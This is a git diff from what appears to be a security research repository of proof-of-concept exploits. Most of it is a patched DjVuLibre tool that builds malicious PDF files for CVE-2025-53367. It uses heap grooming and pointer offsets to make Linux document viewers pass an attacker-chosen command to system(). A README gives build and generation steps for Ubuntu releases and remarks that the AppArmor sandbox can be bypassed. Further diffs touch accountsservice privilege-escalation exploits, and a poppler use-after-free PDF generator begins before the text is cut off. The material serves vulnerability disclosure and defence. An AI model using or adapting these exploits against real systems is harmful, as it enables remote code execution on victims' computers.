++std::string mkcomment(const char *msg, size_t size) { ++ const size_t msglen = strlen(msg); ++ std::string s; ++ s.reserve(size); ++ while (s.size() + msglen <= size) { ++ s += msg; ++ } ++ while (s.size() + 1 <= size) { ++ s += '\n'; ++ } ++ return s; ++} ++ ++static void create_photo_djvu_file(IFFByteStream &iff, ++ const uint16_t distance_traits_to_strtol, ++ const uint16_t distance_strtol_to_system, ++ const char *command) { + // Prepare info chunk +- GP ginfo=DjVuInfo::create(); +- DjVuInfo &info=*ginfo; +- info.width = w; +- info.height = h; +- info.dpi = (flag_dpi>0 ? flag_dpi : 100); +- info.gamma = (flag_gamma>0 ? flag_gamma : 2.2); ++ GP ginfo = DjVuInfo::create(); ++ DjVuInfo &info = *ginfo; ++ info.width = 200; ++ info.height = 200; ++ info.dpi = 100; ++ info.gamma = 2.2; + // Write djvu header and info chunk + iff.put_chunk("FORM:DJVU", 1); + iff.put_chunk("INFO"); + info.encode(*iff.get_bytestream()); ++ { ++ char txt[4096]; ++ memset(txt, 0, sizeof(txt)); ++ strcpy(txt, "kevwozere"); ++ iff.get_bytestream()->write(txt, sizeof(txt)); ++ } + iff.close_chunk(); +- // Write all chunks +- int flag = 1; +- for (int i=0; flag && i gd = JB2Dict::create(); ++ JB2Dict &d = *gd; ++ std::vector comments; ++ size_t comment_idx = 0; ++ d.encode_shape_cb = [&d, &comments, &comment_idx]() { ++ std::string& c = comments[comment_idx++]; ++ d.comment = c.c_str(); ++ }; ++ ++ for (size_t i = 0; i < 0x9; i++) { ++ for (size_t j = 0xb; j > 1; j--) { ++ comments.push_back(""); ++ // Total size will be 16*j-4, so it will allocate ++ // a chunk of size 16*(j+1). ++ djbz_bitmap(d, 3, 1008, (j*0x10 - 0x17)/3 + 1); ++ } ++ } ++ ++ for (size_t i = 0; i < 2; i++) { ++ comments.push_back(""); ++ djbz_bitmap(d, 3, 1008, 0xae); // 0x220 tcache chunk ++ } ++ ++ // The portcaster is a nuisance because it allocates a bunch of ++ // small chunks. The exact amount of memory that it allocates ++ // seems to be non-deterministic, so it could ruin all my ++ // work. Luckily the timing of when it runs is completely ++ // deterministic: it gets triggered every 256 bytes. It gets ++ // called several times during the decoding of the large comment ++ // below, but I have tuned things so that it won't get called ++ // again before the end of this Djbz segment. ++ ++ // The purpose of this large comment is to create a hole in memory ++ // where jimg, prevruns, lineruns, and dcd will get allocated. I ++ // allocate this comment, then plug any other holes in memory ++ // before freeing it so that it will get used for those ++ // allocations. ++ comments.push_back(mkcomment("kevwozere101\n", 0xbdf)); ++ djbz_bitmap(d, 3, 0xff00, 0x2a); ++ ++ // Plug holes. Use a very large bitmap that compresses to a small ++ // size so that the temporary mallocs that happen during parsing ++ // get mmapped and won't interfere with the thread-local arena. 
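As a standalone aside before the hole-plugging loop (not part of the patch; glibc-specific, assuming M_MMAP_THRESHOLD at its default of 128 KiB): requests above the mmap threshold are served by mmap() rather than by the arena, which is why these oversized temporaries leave the thread-local arena's layout alone.

```cpp
#include <cstdio>
#include <cstdlib>

int main() {
  void *small = malloc(0x100);  // served from the malloc arena
  void *big = malloc(1 << 20);  // 1 MiB: above the threshold, so mmap'd
  printf("small=%p big=%p\n", small, big);  // typically far apart
  free(big);                    // munmap'd; arena layout untouched
  free(small);
  return 0;
}
```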
++ for (size_t i = 0; i < 0x10; i++) { ++ comments.push_back(""); ++ djbz_bitmap(d, 3, 0xff00, 0x2a); ++ comments.push_back(""); ++ djbz_bitmap(d, 3, 0xff00, 1); + } ++ ++ comments.push_back(mkcomment("\n", 0x98)); // jimg ++ djbz_bitmap(d, 3, 0xff00, 1); ++ ++ comments.push_back(mkcomment("\n", 0x208)); // prevruns, lineruns ++ djbz_bitmap(d, 3, 0xff00, 1); ++ ++ comments.push_back(mkcomment("\n", 0x78)); ++ djbz_bitmap(d, 3, 0xff00, 1); ++ ++ comments.push_back(mkcomment("kevwozere102\n", 0x17)); ++ ++ d.encode(iff.get_bytestream()); ++ } ++ iff.close_chunk(); ++ ++ chunk_Smmr(iff, distance_traits_to_strtol, distance_strtol_to_system, ++ command); ++ + // Close djvu chunk + iff.close_chunk(); + } + ++// parse an offset like 0x1010 ++uint16_t parse_offset(const char *arg) { ++ unsigned long n; ++ if (strncmp(arg, "0x", 2) == 0) { ++ // hex ++ n = strtoul(arg + 2, 0, 16); ++ } else { ++ // dec ++ n = strtoul(arg, 0, 10); ++ } ++ if (n >= 0x10000) { ++ G_THROW(ERR_MSG("offset is too big for a uint16_t")); ++ } ++ return n; ++} + +-int +-main(int argc, char **argv) +-{ ++int main(int argc, char **argv) { + DJVU_LOCALE; +- GArray dargv(0,argc-1); +- for(int i=0;i gibs=ByteStream::create(g().pnmurl,"rb"); +- ByteStream &ibs=*gibs; +- char prefix[16]; +- memset(prefix, 0, sizeof(prefix)); +- if (ibs.readall((void*)prefix, sizeof(prefix)) < sizeof(prefix)) +- G_THROW( ERR_MSG("c44.failed_pnm_header") ); +-#ifdef DEFAULT_JPEG_TO_HALF_SIZE +- // Default specification for jpeg files +- // This is disabled because +- // -1- jpeg detection is unreliable. +- // -2- quality is very difficult to predict. +- if(prefix[0]!='P' &&prefix[0]!='A' && prefix[0]!='F' && +- !flag_mask && !flag_bpp && !flag_size && +- !flag_slice && !flag_decibel) +- { +- parse_size("10,20,30,50"); +- flag_size = flag_percent = 1; +- } +-#endif +- // Change percent specification into size specification +- if (flag_size && flag_percent) +- for (int i=0; isize())/ 100; +- flag_percent = 0; +- // Load images +- int w = 0; +- int h = 0; +- ibs.seek(0); +- GP iw; +- // Check color vs gray +- if (prefix[0]=='P' && (prefix[1]=='2' || prefix[1]=='5')) +- { +- // gray file +- GP gibm=GBitmap::create(ibs); +- GBitmap &ibm=*gibm; +- w = ibm.columns(); +- h = ibm.rows(); +- iw = IW44Image::create_encode(ibm, getmask(w,h)); +- } +- else if (!GStringRep::cmp(prefix,"AT&TFORM",8) || +- !GStringRep::cmp(prefix,"FORM",4)) +- { +- char *s = (prefix[0]=='F' ? prefix+8 : prefix+12); +- GP giff=IFFByteStream::create(gibs); +- IFFByteStream &iff=*giff; +- const bool color=!GStringRep::cmp(s,"PM44",4); +- if (color || !GStringRep::cmp(s,"BM44",4)) +- { +- iw = IW44Image::create_encode(IW44Image::COLOR); +- iw->decode_iff(iff); +- w = iw->get_width(); +- h = iw->get_height(); +- } +- else +- G_THROW( ERR_MSG("c44.unrecognized") ); +- // Check that no mask has been specified. +- if (! g().mskurl.is_empty()) +- G_THROW( ERR_MSG("c44.failed_mask") ); +- } +- else // just for kicks, try jpeg. 
+- { +- // color file +- const GP gipm(GPixmap::create(ibs)); +- GPixmap &ipm=*gipm; +- w = ipm.columns(); +- h = ipm.rows(); +- iw = IW44Image::create_encode(ipm, getmask(w,h), arg_crcbmode); +- } +- // Call destructor on input file +- gibs=0; +- +- // Perform compression PM44 or BM44 as required +- if (iw) +- { +- g().iw4url.deletefile(); +- GP iff = +- IFFByteStream::create(ByteStream::create(g().iw4url,"wb")); +- if (flag_crcbdelay >= 0) +- iw->parm_crcbdelay(flag_crcbdelay); +- if (flag_dbfrac > 0) +- iw->parm_dbfrac((float)flag_dbfrac); +- int nchunk = resolve_quality(w*h); +- // Create djvu file +- create_photo_djvu_file(*iw, w, h, *iff, nchunk, g().parms); +- } +- } +- G_CATCH(ex) +- { +- ex.perror(); +- exit(1); ++ GArray dargv(0, argc - 1); ++ for (int i = 0; i < argc; ++i) ++ dargv[i] = GNativeString(argv[i]); ++ G_TRY { ++ if (argc != 5) { ++ G_THROW(ERR_MSG("usage: ")); + } ++ ++ // Distance from jimg->blits.traits to __GI___isoc23_strtol pointer ++ const uint16_t distance_traits_to_strtol = parse_offset(argv[1]); ++ ++ // Distance from &__GI___isoc23_strtol to &system ++ const uint16_t distance_strtol_to_system = parse_offset(argv[2]); ++ ++ GURL iw4url = GURL::Filename::UTF8(dargv[4]); ++ iw4url.deletefile(); ++ GP iff = ++ IFFByteStream::create(ByteStream::create(iw4url, "wb")); ++ // Create djvu file ++ create_photo_djvu_file(*iff, distance_traits_to_strtol, ++ distance_strtol_to_system, argv[3]); ++ } ++ G_CATCH(ex) { ++ ex.perror(); ++ exit(1); ++ } + G_ENDCATCH; + return 0; + } diff --git a/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/README.md b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/README.md new file mode 100644 index 0000000..dcfdcf0 --- /dev/null +++ b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/README.md @@ -0,0 +1,62 @@ +# Proof of concept for DjVuLibre CVE-2025-53367 + +This poc uses CVE-2025-53367 to achieve code execution in the +default PDF viewer on many Linux distributions: +[evince](https://gitlab.gnome.org/GNOME/evince) or +[papers](https://gitlab.gnome.org/GNOME/papers). + +Because the DjVuLibre file format is quite complicated, it was +easiest to create the poc by reusing the DjVuLibre codebase, +and modifying one of its tools to generate the poc file. So to +build the poc, you need to clone the official DjVuLibre repo +and then apply a patch: + +```bash +git clone https://git.code.sf.net/p/djvu/djvulibre-git DjVuLibre-poc-CVE-2025-53367 +cd DjVuLibre-poc-CVE-2025-53367 +git checkout 4a285e8da5cd9a2a6b296242a952ee96e519280d +git apply ../DjVuLibre-poc-CVE-2025-53367.diff +``` + +Build it like this: + +```bash +./autogen.sh --prefix=`pwd`/install +make install +``` + +Now generate the poc file like this: + +```bash +./install/bin/c44 0x1010 0x4770 "google-chrome https://www.youtube.com/watch?v=dQw4w9WgXcQ" plucky.pdf # Ubuntu 25.04 +./install/bin/c44 0x1010 0x4360 "google-chrome https://www.youtube.com/watch?v=dQw4w9WgXcQ" noble.pdf # Ubuntu 24.04 +``` + +The first two parameters are offsets that need to be tuned for +different Linux distributions. The first is the distance between two +pointers in `libdjvulibre.so` and the second is the distance between +two pointers in `libc.so`. The third parameter is the command string +that will be passed to `system()`. Note that evince/papers run under +an [AppArmor](https://apparmor.net/) profile which will block some +commands. It's not super-restrictive, so there are ways of getting +past it. 
You can use the `aa-exec` tool to experiment with what's +possible: + +```bash +aa-exec -d -v -p /usr/bin/papers /bin/bash -c "echo 1337 > ~/pwned.txt" +``` + +## Original fuzzer-generated poc + +We published this (much simpler) version of the poc sooner, to help +people quickly test whether they're running a vulnerable version of +DjVuLibre. This poc only causes the DjVuLibre library to crash. + +[Fuzzer-generated poc file](./fuzzer-poc.djvu) + +## Links: + +* https://github.blog/security/vulnerability-research/cve-2025-53367-an-exploitable-out-of-bounds-write-in-djvulibre/ +* https://www.openwall.com/lists/oss-security/2025/07/03/1 +* https://securitylab.github.com/advisories/GHSL-2025-055_DjVuLibre/ +* https://github.com/kevinbackhouse/DjVuLibre-poc-CVE-2025-53367 (this same poc in a standalone git repo) diff --git a/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/fuzzer-poc.djvu b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/fuzzer-poc.djvu new file mode 100644 index 0000000..e4b6b16 Binary files /dev/null and b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/fuzzer-poc.djvu differ diff --git a/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/noble.pdf b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/noble.pdf new file mode 100644 index 0000000..37c9f5f Binary files /dev/null and b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/noble.pdf differ diff --git a/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/plucky.pdf b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/plucky.pdf new file mode 100644 index 0000000..3cdfd1e Binary files /dev/null and b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/plucky.pdf differ diff --git a/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp b/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp index 1a36262..e5fbbcb 100644 --- a/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp +++ b/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp @@ -3,6 +3,9 @@ #include #include #include "utils.hpp" +#include +#include +#include // This number is the buffer size that we use in the "large_mmap" stage. 
// The exact value doesn't matter too much: it just needs to be more than diff --git a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/DBusParse b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/DBusParse index b2c75ca..8d73dbe 160000 --- a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/DBusParse +++ b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/DBusParse @@ -1 +1 @@ -Subproject commit b2c75caace13d54303581a71f72c83bb5239b3a2 +Subproject commit 8d73dbeafd857207bfd76b10ec74b5cc382e1975 diff --git a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoop b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoop index 9bb4a14..4080ace 160000 --- a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoop +++ b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoop @@ -1 +1 @@ -Subproject commit 9bb4a14427dfb7da867cc253f3e064d54b18679a +Subproject commit 4080acee5be79591d72a0ad239303574235a5236 diff --git a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoopDBusHandler b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoopDBusHandler index 019faea..16926a0 160000 --- a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoopDBusHandler +++ b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoopDBusHandler @@ -1 +1 @@ -Subproject commit 019faea2c0e00ba1047b7a0eb3861769896d6dd1 +Subproject commit 16926a08464267186fb316e615b9363f10d75c8a diff --git a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc.cpp b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc.cpp index 2a037bb..3ef9671 100644 --- a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc.cpp +++ b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc.cpp @@ -433,7 +433,7 @@ class Run { // This is declared outside of the loop because we want to remember the // the last value that it's set to. - char email[64] = "kevwozere@kevwozere.com"; + char email[128] = "kevwozere@kevwozere.com"; // Try to occupy the chunk. for (size_t i = 0; i < batch_size1; i++) { diff --git a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc2.cpp b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc2.cpp index d03cc4c..147a968 100644 --- a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc2.cpp +++ b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc2.cpp @@ -420,7 +420,7 @@ class AccountsHandler : public DBusHandler { // call the SetEmail method with the same email address as last time, so // that we trigger a polkit check that will get approved, but without // jumbling the memory any further. - char email_[64] = "kevwozere@kevwozere.com"; + char email_[128] = "kevwozere@kevwozere.com"; private: int quit() { @@ -719,7 +719,7 @@ class AccountsHandler : public DBusHandler { // we don't want. 
accounts_set_property( my_objectpath_.c_str(), "SetEmail", email_, - [this](const DBusMessage&, bool) -> int { + [](const DBusMessage&, bool) -> int { return 0; } ); @@ -806,13 +806,13 @@ int main(int argc, char* argv[]) { EPollManager manager(loop); DBusAuthHandler* polkit_auth_handler = - new DBusAuthHandler(loop, info.uid_, new PolkitHandler(info, manager)); + new DBusAuthHandler(info.uid_, new PolkitHandler(info, manager)); if (loop.add_handler(polkit_auth_handler) < 0) { throw Error(_s("Failed to add PolkitHandler")); } DBusAuthHandler* accounts_auth_handler = - new DBusAuthHandler(loop, info.uid_, new AccountsHandler(info, manager)); + new DBusAuthHandler(info.uid_, new AccountsHandler(info, manager)); if (loop.add_handler(accounts_auth_handler) < 0) { throw Error(_s("Failed to add AccountsHandler")); } diff --git a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc3.cpp b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc3.cpp index 7ebe26e..df7f2d2 100644 --- a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc3.cpp +++ b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc3.cpp @@ -428,7 +428,7 @@ class AccountsHandlerBase : public DBusHandler { // call the SetEmail method with the same email address as last time, so // that we trigger a polkit check that will get approved, but without // jumbling the memory any further. - char email_[64] = "kevwozere@kevwozere.com"; + char email_[128] = "kevwozere@kevwozere.com"; public: AccountsHandlerBase( @@ -611,7 +611,7 @@ class AccountsHandler : public AccountsHandlerBase { fflush(stderr); } - int attempt_exploit() { + int attempt_exploit() override { choose_batch_size(); return findUserByID( @@ -637,7 +637,7 @@ class AccountsHandler : public AccountsHandlerBase { accounts_set_property( my_objectpath_.c_str(), "SetEmail", email_, - [this](const DBusMessage&, bool) -> int { + [](const DBusMessage&, bool) -> int { return 0; } ); @@ -767,7 +767,7 @@ class TriggerBugHandler : public AccountsHandlerBase { ); } - int attempt_exploit() { + int attempt_exploit() override { choose_batch_size(); const pid_t pid = search_pid(accounts_daemon, sizeof(accounts_daemon)); @@ -868,19 +868,19 @@ int main(int argc, char* argv[]) { // In the child process, we just continually trigger the bug at // 1-second intervals. 
DBusAuthHandler* trigger_bug_auth_handler = - new DBusAuthHandler(loop, info.uid_, new TriggerBugHandler(info, manager)); + new DBusAuthHandler(info.uid_, new TriggerBugHandler(info, manager)); if (loop.add_handler(trigger_bug_auth_handler) < 0) { throw Error(_s("Failed to add TriggerBugHandler")); } } else { DBusAuthHandler* polkit_auth_handler = - new DBusAuthHandler(loop, info.uid_, new PolkitHandler(info, manager)); + new DBusAuthHandler(info.uid_, new PolkitHandler(info, manager)); if (loop.add_handler(polkit_auth_handler) < 0) { throw Error(_s("Failed to add PolkitHandler")); } DBusAuthHandler* accounts_auth_handler = - new DBusAuthHandler(loop, info.uid_, new AccountsHandler(info, manager)); + new DBusAuthHandler(info.uid_, new AccountsHandler(info, manager)); if (loop.add_handler(accounts_auth_handler) < 0) { throw Error(_s("Failed to add AccountsHandler")); } diff --git a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md index 109c6cf..96d0ac4 100644 --- a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md +++ b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md @@ -1,4 +1,4 @@ -For more information about this exploit PoC, see the [blog post](https://lgtm.com/blog/apple_xnu_dtrace_CVE-2017-13782). +For more information about this exploit PoC, see the [blog post](https://securitylab.github.com/research/apple-xnu-dtrace-CVE-2017-13782/). This exploit PoC is designed for macOS High Sierra version 10.13. Apple released a patch on [Oct 31, 2017](https://support.apple.com/en-us/HT208221). diff --git a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c index 9b03e1c..f838f4f 100644 --- a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c +++ b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c @@ -2,7 +2,6 @@ * Copyright Kevin Backhouse / Semmle Ltd (2017) * License: Apache License 2.0 * - * For more information: https://lgtm.com/blog/apple_xnu_dtrace_cve-2017-13782 */ #include #include diff --git a/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md b/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md index 1dfd364..b6b0d40 100644 --- a/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md +++ b/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md @@ -2,7 +2,7 @@ Proof-of-concept exploit for a remotely triggerable heap buffer overflow vulnerability in iOS 11.4.1 and macOS 10.13.6. This exploit can be used to crash any vulnerable iOS or macOS device that is connected to the same network as the attacker's computer. The vulnerability can be triggered without any user interaction on the victim's device. The exploit involves sending a TCP packet with non-zero options in the IP and TCP headers. It is possible that some routers or switches will refuse to deliver such packets, but it has worked for me on all the home and office networks that I have tried it on. However, I have found that it is not usually possible to send the malicious packet across the internet. -For more information about the vulnerability, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407). +For more information about the vulnerability, see the [blog post](https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/). 
 The buffer overflow is in this code [bsd/netinet/ip_icmp.c:339](https://github.com/apple/darwin-xnu/blob/0a798f6738bc1db01281fc08ae024145e84df927/bsd/netinet/ip_icmp.c#L339):
diff --git a/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md b/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md
index dc692ac..6d8a9bb 100644
--- a/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md
+++ b/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md
@@ -2,7 +2,7 @@
 This directory contains a minimal [NFS](https://en.wikipedia.org/wiki/Network_File_System) server. It only implements a very small subset of the [NFS protocol](https://www.ietf.org/rfc/rfc1813.txt): just enough to trigger one of the buffer overflow vulnerabilities in the macOS XNU operating system kernel. The vulnerabilities were fixed in macOS version [10.13.6](https://support.apple.com/en-gb/HT208937).
 
-For more details about the vulnerabilities, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_nfs_vfsops_CVE-2018-4259).
+For more details about the vulnerabilities, see the [blog post](https://securitylab.github.com/research/cve-2018-4259-macos-nfs-vulnerability/).
 
 To compile and run (on Linux):
diff --git a/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md b/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md
index ea94b42..a55efe8 100644
--- a/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md
+++ b/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md
@@ -4,4 +4,4 @@ Proof-of-concept exploit for remote code execution vulnerability in the packet-m
 Update: Apple's fix for the infinite loop bug was incomplete. The fix for CVE-2018-4460 was released on December 5, 2018.
 
-For details on how to compile and run this exploit, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_packet_mangler_CVE-2017-13904).
+For details on how to compile and run this exploit, see the [blog post](https://securitylab.github.com/research/CVE-2018-4249-apple-xnu-packet-mangler/).
diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52886/.gitignore b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/.gitignore
new file mode 100644
index 0000000..a8ff98c
--- /dev/null
+++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/.gitignore
@@ -0,0 +1 @@
+pdfgen
diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52886/Makefile b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/Makefile
new file mode 100644
index 0000000..989e543
--- /dev/null
+++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/Makefile
@@ -0,0 +1,2 @@
+pdfgen: pdfgen.cpp utils.cpp utils.h
+	g++ -Wall -Wextra -g -O0 pdfgen.cpp utils.cpp -lz -o pdfgen
diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52886/README.md b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/README.md
new file mode 100644
index 0000000..0f480bb
--- /dev/null
+++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/README.md
@@ -0,0 +1,25 @@
+# Proof of concept for poppler CVE-2025-52886
+
+CVE-2025-52886 is a use-after-free vulnerability in
+[poppler](https://gitlab.freedesktop.org/poppler), caused by a
+reference count overflow. Reference counting was done with a 32-bit
+counter, which made it feasible to overflow. In my testing, however,
+overflowing the counter took approximately 12 hours, so the risk of
+exploitation was low.
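+
+To see why a 32-bit counter is a problem, here is a minimal,
+self-contained sketch (illustrative only, not poppler's actual code):
+incrementing a 32-bit reference count 2^32 - 1 times wraps it back to
+zero, at which point one more release would free an object that is
+still in use:
+
+```cpp
+#include <cstdint>
+#include <cstdio>
+
+// Toy refcounted object with a 32-bit counter, loosely modeled on the
+// bug class; poppler's real object model is more involved.
+struct Obj {
+  uint32_t refcount = 1;
+  void incRef() { ++refcount; }             // wraps silently at 2^32
+  bool decRef() { return --refcount == 0; } // true => caller frees
+};
+
+int main() {
+  Obj o;
+  for (uint64_t i = 0; i < 0xFFFFFFFFull; ++i) {
+    o.incRef(); // after 2^32 - 1 increments the counter is 0 again
+  }
+  printf("refcount = %u\n", o.refcount); // prints 0
+  // A real implementation would now free the object on the next
+  // decRef, even though live references remain: use-after-free.
+  return 0;
+}
+```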
+
+This directory contains the code for building the proof-of-concept. To
+run it:
+
+```bash
+make
+./pdfgen > poc.pdf
+```
+
+Notice that the size of the generated PDF is only 3104 bytes. Now try
+to either open the PDF or run a command line application like
+`pdftohtml` on it.
+
+## Links:
+
+* https://gitlab.freedesktop.org/poppler/poppler/-/issues/1581
+* https://securitylab.github.com/advisories/GHSL-2025-054_poppler/
diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52886/pdfgen.cpp b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/pdfgen.cpp
new file mode 100644
index 0000000..34514db
--- /dev/null
+++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/pdfgen.cpp
@@ -0,0 +1,626 @@
+#include "utils.h"
+#include <assert.h>
+#include <ctype.h>
+#include <endian.h>
+#include <exception>
+#include <functional>
+#include <memory>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <string>
+#include <unistd.h>
+#include <vector>
+
+// Exception class. Caught in main().
+class Error : public std::exception {
+  std::string msg_;
+
+public:
+  Error() = delete; // No default constructor.
+  explicit Error(const char *msg) : msg_(msg) {}
+  explicit Error(std::string &&msg) : msg_(std::move(msg)) {}
+
+  const char *what() const noexcept override { return msg_.c_str(); }
+};
+
+void write_hexdigit(WriteBuf &buf, const uint8_t x) {
+  if (x < 10) {
+    buf.write_uint8('0' + x);
+  } else if (x < 16) {
+    buf.write_uint8('A' + x - 10);
+  } else {
+    throw Error("Bad hex digit");
+  }
+}
+
+void write_octal_uint8(WriteBuf &buf, const uint8_t x) {
+  write_hexdigit(buf, x >> 6);
+  write_hexdigit(buf, (x >> 3) & 0x7);
+  write_hexdigit(buf, x & 0x7);
+}
+
+void write_hex_uint8(WriteBuf &buf, const uint8_t x) {
+  write_hexdigit(buf, x >> 4);
+  write_hexdigit(buf, x & 0xF);
+}
+
+void write_stringobj(WriteBuf &buf, const std::string &str) {
+  buf.write_string("(");
+  for (auto c : str) {
+    if (isprint(c)) {
+      buf.write_uint8(c);
+    } else {
+      buf.write_uint8('\\');
+      write_octal_uint8(buf, static_cast<uint8_t>(c));
+    }
+  }
+  buf.write_string(")");
+}
+
+void write_nameobj(WriteBuf &buf, const std::string &str) {
+  buf.write_string("/");
+  for (auto c : str) {
+    if (isprint(c)) {
+      buf.write_uint8(c);
+    } else {
+      buf.write_uint8('#');
+      write_octal_uint8(buf, static_cast<uint8_t>(c));
+    }
+  }
+  buf.write_string(" ");
+}
+
+void write_intobj(WriteBuf &buf, int i) {
+  char str[32];
+  snprintf(str, sizeof(str), "%d ", i);
+  buf.write_string(str);
+}
+
+void write_numobj(WriteBuf &buf, double d) {
+  char str[64];
+  snprintf(str, sizeof(str), "%f ", d);
+  buf.write_string(str);
+}
+
+void write_command(WriteBuf &buf, const std::string &cmd) {
+  buf.write_string(cmd.c_str());
+  buf.write_string("\n");
+}
+
+class PDF {
+public:
+  PDF() {}
+  virtual ~PDF() {}
+
+  virtual void write(WriteBuf &buf) const = 0;
+};
+
+typedef std::unique_ptr<PDF> PDFptr;
+typedef std::vector<PDFptr> PDFvec;
+
+// Utility for reading the current file offset.
+class PDF_ReadPreOffset : public PDF {
+  const std::function<void(size_t)> f_;
+  const PDFptr child_;
+
+public:
+  PDF_ReadPreOffset(std::function<void(size_t)> &&f, PDFptr &&child)
+      : f_(std::move(f)), child_(std::move(child)) {}
+
+  static std::unique_ptr<PDF> mk(std::function<void(size_t)> &&f,
+                                 PDFptr &&child) {
+    return std::make_unique<PDF_ReadPreOffset>(std::move(f), std::move(child));
+  }
+
+  void write(WriteBuf &buf) const override {
+    f_(buf.offset());
+    child_->write(buf);
+  }
+};
+
+// Utility for reading the current file offset.
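+// (PDF_ReadPostOffset is the counterpart of PDF_ReadPreOffset above: it
+// records the offset *after* its child has been written, not before.)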
+class PDF_ReadPostOffset : public PDF {
+  const std::function<void(size_t)> f_;
+  const PDFptr child_;
+
+public:
+  PDF_ReadPostOffset(std::function<void(size_t)> &&f, PDFptr &&child)
+      : f_(std::move(f)), child_(std::move(child)) {}
+
+  static std::unique_ptr<PDF> mk(std::function<void(size_t)> &&f,
+                                 PDFptr &&child) {
+    return std::make_unique<PDF_ReadPostOffset>(std::move(f),
+                                                std::move(child));
+  }
+
+  void write(WriteBuf &buf) const override {
+    child_->write(buf);
+    f_(buf.offset());
+  }
+};
+
+class PDF_Int : public PDF {
+  const int i_;
+
+public:
+  explicit PDF_Int(int i) : i_(i) {}
+
+  static std::unique_ptr<PDF> mk(int i) {
+    return std::make_unique<PDF_Int>(i);
+  }
+
+  void write(WriteBuf &buf) const override { write_intobj(buf, i_); }
+};
+
